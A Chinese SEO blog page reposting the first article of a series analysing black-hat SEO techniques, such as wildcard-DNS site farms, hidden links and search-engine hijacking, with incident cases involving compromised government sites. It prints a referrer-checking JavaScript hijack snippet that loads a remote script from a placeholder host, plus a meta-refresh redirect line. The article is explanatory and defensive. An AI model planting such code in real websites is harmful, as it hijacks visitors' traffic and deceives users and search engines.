厦门SEO 欢迎您的访问!在这里、您可以学到最新潮的SEO技术"干货" (๑•̀ㅂ•́)و✧ 让优化成为一种生活习惯~

  • 首页 
  • 厦门SEO 
  • 厦门网站建设 
  • 厦门网络推广 
  • 外贸营销 

推荐阅读

AMP 开发文档【精炼核心规范 新手易懂】

厦门SEO 2018-09-08 0 5

如何做好海外推广?谷歌Google推广教程!外贸营销攻略~

厦门SEO 2018-12-26 0 10

2019年、SEO市场,我有一个野心!

厦门SEO 2018-12-28 0 13

「网站标题设计」就《百度搜索网页标题规范》,浅谈:网站标题怎么写?

厦门SEO 2018-11-24 2 7

厦门SEOer改如何进行网站编辑?将一篇文章详情页做到百度首页!

厦门SEO 2018-09-24 0 8

厦门SEO

厦门SEO

  • 「城市分站」
  •  首页
  • 厦门SEO
    • 百度SEO
    • 谷歌SEO
  • 厦门网站建设
    • 厦门熊掌号
    • 厦门小程序
  • 厦门网络推广
  • 外贸营销
  •  首页
  •  厦门SEO
  •  厦门网站建设
  •  厦门网络推广
  •  外贸营销
首页 厦门SEO 正文
厦门SEO

黑帽SEO剖析之手法篇

屈兴东
2018-09-05 1,768 0

此系统文章总共分为四篇,分别是手法篇、工具篇、隐藏篇、总结篇;本篇为黑帽SEO之手法篇,主要介绍黑帽seo的概念以及一些常用的手法。  

首先得说黑帽SEO是个老话题,我不难想象评论区必定有人吐槽此手法已经由来已久,作者有炒冷饭的嫌疑。我对此观点表示认可,然而细细回味之后,却又感到无奈不解。一个早已被用烂的黑产手法,一个每年给互联网产业造成巨大损失的黑色手段,为何能一直延续至今?是技术上难以攻破,还是利益驱使下选择视而不见?

当我发现公开资源中对此黑产手法的介绍寥寥无几且并不详细时,原因便可想而知了。为了营造了一个良好的互联网环境,我在此结合实际案列对黑帽SEO这种黑产手段进行剖析介绍,希望能够使安全界同道引起共鸣,共同抵制。

由于距本文撰写已过去一年之久,而此期间我已不在研究相关技术,因此若文章内容有任何偏差及谬误请谅解。

插曲:有趣的是,就在前几天有位朋友询问了我关于黑帽SEO方面的问题,原因是他一位朋友运营的一个网站,页面莫名其妙出现了赌博博彩的内容,删除后又会自动生成,其十分苦难便寻求他帮忙。

黑帽seo概念

SEO全称为搜索引擎优化,是指通过站内优化、站外优化等方式,提升搜索引擎收录排名。既然有SEO技术,便会有相应的从业人员,他们被称为白帽SEO,专指通过公正SEO手法,帮助提升站点排名的专业人员。

当然有白便会有黑,由于白帽SEO优化的过程将会十分漫长,一个新站想要获取好的排名,往往需要花上几年时间做优化推广。因此一些想要快速提升自身网站排名的小伙伴,便开始在SEO上研究作弊手法,从而诞生了黑帽SEO。黑帽SEO是指通过作弊手段,让站点快速提升排名的一类SEO技术,或者说是黑客技术,比如说:黑链(暗链)、站群、网站劫持(搜索引擎劫持)、桥页等,黑帽SEO能够快速提升排名,但毕竟是违规作弊行为,容易被K。

SEO的一些黑色手法

黑帽SEO的手法很多,并且在不断地更新换代,其中最常见的包括利用泛解析做站群,入侵高权重网站挂暗链,入侵高权重网站做网页劫持,篡改高权重网站网页内容,利用高权重网站二级目录做推广页面,修改nginx配置做目录反向代理等等。接下来我结合实际案例,介绍一些常用的手段。

利用泛解析建立泛二级域名站群:

利用DNS泛解析可以快速建立站群,因为一个一级域名便可以衍生出无数个二级域名,当然一般需要借助站群工具,因为建立站群需要有很多内容不同的页面,手工建立显然不可能。而seo人员大费周章地建立站群的目的,便是能够快速吸引大量的搜索引擎爬虫,增加网站在搜索引擎中的收录量。以下是某个泛二级域名站群案例截图:

黑帽SEO剖析之手法篇-厦门SEO

需要说明的是,以上截图中的二级域名并不是通过一条条dns解析记录去绑定的,解析里面设置的是*,也就是泛解析。而服务器端有程序或者代码去控制当构造不同的二级域名访问时,会返回不同的网页内容,也就让搜索引擎误认为每个二级域名都是一个单独的网站。

泛解析有很多优点,比如对用户友好(即使输错二级域名也能跳转到目标网站),又能够更快速地被搜索引擎收录等。基于这些优点,很多站长会选择用此方式来增加网站收录,然而如果没有妥善的使用泛解析可能会带来难以想象的危害。

利用泛解析做黑产:

利用泛解析做黑帽seo的方式也有很多种,基于是否需要入侵网站以及dns服务器,我分为入侵法与非入侵法来介绍。

入侵法:

真实案例:几个月前我们发现一个重要政府网站出现了大量博彩页面,取证截图如下:

黑帽SEO剖析之手法篇-厦门SEO

经过分析我发现,此手法利用的便是泛解析,从截图中可以看到出现了大量此政府网站的二级甚至三级域名,而这些域名都是随机构造的,访问后会跳转到博彩色情等非法页面,而访问一级域名又是正常的内容。且先不分析跳转的过程中用到了哪些技术,单从泛解析记录就不难看出,此网站被人篡改了dns解析记录。我们有理由相信,黑客获取了此域名的dns解析控制权限,并将此域名泛解析到黑客准备好的服务器上。那么黑客这么做的目的很明显,为了让搜索引擎快速收录二级或者三级域名,从而达到引流到非法页面的目的。

我们通过分析此政府网站被入侵特征推导出此事件过程应该是,黑客通过入侵手段获取到了该政府网站dns解析权限(如何获取暂不可知),然后通过添加泛解析记录,将此记录指向黑客准备好的服务器,而此服务器上有动态语言去实现通过不同二级域名访问,返回不同的页面结果功能。由于政府网站本身权重很高,因此二级域名页面被百度快速收录,达到为非法页面引流的目的。这种手法的好处在于不必入侵网站,而只要获取到域名解析权限即可(当然获取域名解析权限也并非易事)。

非入侵法:

真实案例:几天前我们发现有一个网站(sdddzg.cn)利用泛解析做恶意推广,查看网站特征后,我们尝试构造不同的二级域名访问,取证截图如下。构造二级域名访问:

黑帽SEO剖析之手法篇-厦门SEO

最终返回结果:

黑帽SEO剖析之手法篇-厦门SEO

可以看到返回结果对网页内容以及url做了处理,当我们尝试构造不同的二级域名访问,发现返回结果内容都不一样,然而通过获取ip发现来自同一台服务器。首先我们不难想到,此域名一定是做了泛解析的,那么它是如何控制网页内容变化的呢?查看网页源码可以看到jiang.gov.cn网页源码被嵌入到了目标网页中。

黑帽SEO剖析之手法篇-厦门SEO

那么其实想要实现此技术也并不难,可以在服务端上用代码实现。首先通过获取请求的二级域名地址,然后去访问该二级域名内容获取源码镶嵌到自己的网页内。如果构造的二级域名内容不是一个完整的域名地址(如:1.sdddzg.cn),则随机返回一段源码。这种手法的好处在于不必入侵网站,只需要自己搭建一台服务器即可,但推广效果没有那么好。

利用网站暗链:

在网页中植入暗链这种手法已经相对落伍了,目前用的也比较少,因为搜索引擎已经能够对此作弊手法进行检测。为了介绍知识的完整性,此处我简单介绍一下。暗链也称为黑链,即隐蔽链接 hidden links,是黑帽SEO的作弊手法之一。挂暗链的目的很简单,增加网站外链,提高网站排名;实现方式主要分为几种:利用CSS实现、利用JS实现、利用DIV+JS实现等。具体介绍请参考:黑帽SEO之暗链

利用高权重网站,构造关键词URL做推广:

真实案例:一年前当我刚研究黑帽SEO的时候发现了一个有趣的黑帽SEO方式,虽然手法比较拙劣老套,但却也有成效。于是在写这篇文章的时候,我特意找了一个典型案例,与大家分享,取证截图如下。

黑帽SEO剖析之手法篇-厦门SEO

将URL中的参数内容显示到网页内,这原本是某些网页的一种特殊功能。以往的经验告诉我这种特性如果没有处理好,可能会引发XSS漏洞,而今我不得不认识到,这种特性也一直被用于黑帽seo。通过在url或者post数据包(常见于搜索框功能)中构造推广关键词,再将有推广关键词页面添加到蜘蛛池中,使搜索引擎收录就能达到推广的目的。一般此种手法常被用来推广qq号,盈利网站等(类似打广告),而当我们通过搜索引擎搜索某些关键词时(如色情资源),就会显示出此页面,从而达到推广自身账号或者网站的目的,当然这只是一种推广手段,并不太涉及引流。

利用网页劫持引流:

网页劫持,又叫网站劫持或者搜索引擎劫持,是目前黑帽SEO中最流行的一种做法。其原因可以简单概括为:易收录、难发现,易收录表现为搜索引擎尚没有很好的机制能够检测出此作弊手段,网页劫持手法仍然能够大量引流。难发现是指网页劫持手法比较隐蔽,一般非技术人员很难发现它的存在。

网页劫持从手法上可以分为服务端劫持、客户端劫持、百度快照劫持、百度搜索劫持等等;

网页劫持的表现形式可以是劫持跳转,也可以是劫持呈现的网页内容(与直接篡改网页内容不同),目前被广泛应用于私服、博彩等暴利行业。

网页劫持真实案例:

黑帽SEO剖析之手法篇-厦门SEO

几个月前我处理了一起网页劫持案列,起因是某政府网站上出现了博彩相关内容(排除新闻页面),这显然是不合规的。排除管理员失误添加导致,恐怕此网站多半是被黑客入侵了。首先我访问了该记录上的链接,紧接着浏览器中出现了一个正常的政府页面,而也就须臾之间,网页瞬间又跳转到了博彩网页。图一为正常政府页面:

黑帽SEO剖析之手法篇-厦门SEO

图二为博彩页面:

黑帽SEO剖析之手法篇-厦门SEO

可以看到博彩页面的域名为www.0980828.com,显然不是先前的政府网站域名xxxx.gov.cn。看到此现象,再结合多年安全经验,我大致能够猜测此网站应该是被网页劫持了。通过分析以上过程的数据包,不难发现在该网站前端页面被嵌入了一段非法代码。

黑帽SEO剖析之手法篇-厦门SEO

此代码存放在43.250.75.61服务器上,查看该服务器信息,发现其在日本。

黑帽SEO剖析之手法篇-厦门SEO

而通过访问此段代码,返回内容则是跳转到www.0980828.com网站上。

黑帽SEO剖析之手法篇-厦门SEO

分析至此,我们不难发现,导致页面跳转的原因便是xxxx.gov.cn网页被非法嵌入了一窜代码,而此代码能够控制访问该网页时跳转到博彩页面。这是搜索引擎劫持最为基础且常见的一种方式,其变种甚多,类型方式也各异。最后我通过登录web服务器查看,发现了存在大量html文件被篡改,且都在文件开头被写入外部js引用。那么此入侵事件过程应该是,黑客通过web应用程序某些漏洞入侵服务器(实际是管理后台弱口令+任意文件上传),通过批量篡改服务器静态文件实现网页劫持的目的。网页劫持的手法非常多,并不是这一个案例就能概括的,更多详细情况请继续看下文介绍。

服务端劫持:

服务端劫持也称为全局劫持,此手法为修改网站动态语言文件,判断访问来源控制返回内容,从而达到网页劫持的目的。其特点往往是通过修改asp/aspx/php等后缀名文件,达到动态呈现网页内容的效果。

Global.asa、Global.asax、conn.asp、conn.php等文件比较特殊,作用是在每次执行一个动态脚本的时候,都会先加载该脚本,然后再执行目标脚本。所以只要在 Global.asa 中写判断用户系统信息的代码(访问来源等),如果是蜘蛛访问则返回关键词网页(想要推广的网站),如果是用户访问则返回正常页面。

客户端劫持:

客户端劫持的手法也很多,但最常用的就两种:js劫持与Header劫持。js劫持目的是通过向目标网页植入恶意js代码,控制网站跳转、隐藏页面内容、窗口劫持等。js植入手法是可以通过入侵服务器,直接写入源代码中;也可以写在数据库中,因为有些页面会呈现数据库内容。js劫持代码案例:以下代码可以使通过搜索引擎搜索的并点击页面时,执行一段js并跳转到博彩页面;而直接输入网址访问网页时,跳转到一个404页面。

today=new Date();
today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate();
var regexp=/\.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referer;
if(regexp.test(where)){
document.write ('<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>');
}
else
{
window.location.href="../../404.htm";
}

代码分析:通过referer判断来路,如果referer来路为空就是跳转到404页面,如果是搜索引擎来的referer里面也会有显示,然后在写代码控制跳转。如果只是控制实现显示不同的内容,可以修改php、asp代码;如果需要劫持搜索引擎搜索框,可以写JS代码来做浏览器本地跳转。当然js功能可以无限扩展,比如可以控制一个ip一天内第一次访问正常,其余访问跳转等等。header劫持,就是在html代码的head中添加特殊标签,代码如下:

<meta http-equiv="refresh" content="10; url=http://thief.one">

header劫持利用的就是Meta Refresh Tag(自动转向)功能将流量引走。

直接篡改网页内容(比较低级):

有些黑客在入侵网站后,喜欢直接篡改网页内容,比如放上自己的qq号,或者作为推广将网页篡改成非法页面。在此我对此做法的黑客表示鄙视,因为这是一种最恶劣最低级的手法。恶劣在于直接篡改网页内容,可能会导致网站无法挽回的损失;低级在于此手法极易被发现,起不到真正的引流推广作用。

利用高权重网站二级目录:

即黑客入侵网站后,在网站二级目录下创建很多自己做推广的页面。为了达到引流的目的黑客往往需要建立大量的二级目录页面,因此需要用到寄生虫程序来自动化的创建页面。此手法也需要入侵高权重网站,获取网站服务器权限。与网页劫持手法不同的是,此手法侧重点在于利用高权重网站自身的优势,在其目录下创建多个推广页面;而网页劫持侧重隐藏自身,其可以做到动态呈现网页内容给客户。因此在实际使用中,黑客经常结合两者使用。此手法与利用泛解析做黑帽seo的手法还是有明显差异的,虽然同样是利用高权重网站本身的优势,但泛解析利用的是二级域名,而此手法利用的是二级目录,当然两者有异曲同工之妙。

利用高权重网站二级目录手法的案例与泛解析案例类似,这里不再详述。既然我前面提到此手法往往需要寄生虫程序的配合使用,那么何为寄生虫程序?它又有何玄机?下篇将会详细介绍,敬请期待。

小结:黑产的技术再不断进步,我们没法停滞不前!

#厦门SEO#百度SEO#黑帽SEO

本文由 屈兴东 原创发布于:厦门SEO。未经许可,禁止转载!

屈兴东

百度可查:“屈兴东”、出生于湖北黄冈的95后程序小伙。 屈兴东:https://www.quxingdong.com/ | 厦门SEO:https://seo.quxingdong.com/ | 厦门网站建设:https://web.quxingdong.com/ .

扫码关注

3

微信扫一扫,分享到朋友圈

2018黑帽SEO网站搜索引擎首页排名技术汇总! 黑帽SEO剖析之工具篇

文章评论 (0)

😉😐😡😈🙂😯🙁🙄😛😳😮😆💡😀👿😥😎➡😕❓❗
再想想

    搜索文章:

    相关文章:

    • 「新手做seo怎么做?」三种SEO作弊行为,千万不要模仿!

      「新手做seo怎么做?」三种SEO作弊行为,千万不要模仿!

    • 「SEO百科」2021年外贸网站SEO关键词排名优化提升技巧!

      「SEO百科」2021年外贸网站SEO关键词排名优化提升技巧!

    • 「seo入门基础知识」如何检查SEO的优化效果?

      「seo入门基础知识」如何检查SEO的优化效果?

    • 「SEO百科」SEO不分黑白灰帽!

      「SEO百科」SEO不分黑白灰帽!

    热点文章:

    • 「seo技术」优质内容SEO搜索引擎排名优化指导建议!
      「seo技术」优质内容SEO搜索引擎排名优化指导建议!
      948
    • 「SEO百科」外贸企业独立站如何做好SEO?
      「SEO百科」外贸企业独立站如何做好SEO?
      883
    • 「谷歌SEO」英文网站怎么进行seo优化?
      「谷歌SEO」英文网站怎么进行seo优化?
      776
    • 「seo推广」外贸网站SEO优化方案分享!
      「seo推广」外贸网站SEO优化方案分享!
      757

    专题集锦

    • 厦门SEO (150)
    • 厦门小程序 (5)
    • 厦门熊掌号 (7)
    • 厦门网站建设 (72)
    • 厦门网络推广 (121)
    • 外贸营销 (61)
    • 百度SEO (127)
    • 谷歌SEO (115)

    标签聚合:

    2019年 (4) 2019年SEO (4) MIP接入 (3) MIP教程 (3) MIP框架 (3) PPC (4) SEM (3) SEO (14) SEO优化 (29) SEO分析 (3) SEO技术 (3) SEO教程 (8) SEO策略 (4) 厦门SEO (65) 厦门SEO优化 (5) 厦门外贸营销 (19) 厦门小程序 (3) 厦门网站建设 (14) 厦门网络推广 (16) 厦门网络营销 (5) 厦门谷歌SEO (3) 厦门谷歌优化 (3) 厦门谷歌排名 (3) 厦门谷歌推广 (4) 名族自治区SEO (6) 城市SEO (81) 城市分站 (79) 外贸网站 (3) 外贸营销 (17) 小程序 (2) 广东SEO (22) 江苏SEO (14) 浙江SEO (12) 白帽SEO (4) 百度SEO (38) 直辖市SEO (3) 省份SEO (48) 网站优化 (5) 网站标题 (3) 网站标题怎么写 (3) 网络营销 (4) 英文SEO (4) 谷歌Google推广 (4) 谷歌SEO (37) 黑帽SEO (8)

    站点公告:

    • 同类型网站友链申请
      或购买本站外链/广告位加:
    • 2648439388 ( QQ ) !

    云服务商力荐(๑•̀ㅂ•́)و✧:

    腾讯云新客专属福利

    关于我们:

    厦门SEO,十年专注厦门SEO优化、厦门网站推广。屈兴东专业:厦门网站建设、厦门网站优化、厦门网络推广、厦门外贸营销……是知名厦门SEO顾问,专心厦门百度SEO优化、厦门谷歌SEO优化、厦门神马搜狗360必应SEO优化!通过网站建设、网站优化、网络推广、外贸营销等多维一体式互联网服务,轻松帮您实现厦门网站建设、厦门网站优化、厦门网络推广、厦门外贸营销~厦门关键词百度谷歌等主流搜索引擎SEO首页排名优化,请认准——厦门SEO顾问:seo.quxingdong.com。选择我们、就是选择了互联网+Ai时代新技术解决方案!!!如果您有以上介绍的互联网服务需求?亦或是想找名实战资深厦门SEO顾问探讨技术方案?欢迎通过下方多种平台方式添加到我 、进行咨询!!!ヾ(^▽^*)~ ——【厦门SEO】

    • 打开 手机QQ 、扫描下方二维码!

      打开 手机QQ 、扫描下方二维码!
    • 打开手机微信、扫描下方二维码!

      打开手机微信、扫描下方二维码!
    • 打开手机百度、扫描下方二维码!

      打开手机百度、扫描下方二维码!

    厦门SEO顾问(微信扫码):

    厦门SEO顾问

    相关页面:

    • 网站地图
    • 专题合集
    • 链接导航
    • 腾讯专栏
    • 熊掌主页
    • 免责声明
    • 本站打开速度:0.24秒!想要跟我一样快?

    Copyright © 2018~2022 厦门SEO . 闽ICP备17002261号-6 .厦门SEO厦门SEO Design By 屈兴东 . 

    本页共执行:46 次查询操作!共耗时:0.111 秒!版权所有归:厦门SEO.